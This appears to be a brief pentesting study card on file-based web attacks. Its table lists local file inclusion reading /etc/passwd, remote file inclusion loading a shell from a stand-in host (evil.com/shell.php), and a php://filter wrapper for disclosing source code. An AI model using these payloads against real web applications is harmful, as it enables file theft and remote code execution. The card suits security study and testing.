File-Based Attacks
Exploiting file handling vulnerabilities in web applications.
Skills
- File Inclusion - LFI/RFI exploitation
Quick Reference
| Type | Payload | Impact |
|---|---|---|
| LFI | ../../../etc/passwd |
File read |
| RFI | http://evil.com/shell.php |
RCE |
| PHP Wrapper | php://filter/convert.base64-encode |
Source disclosure |
Converted and distributed by TomeVault — claim your Tome and manage your conversions.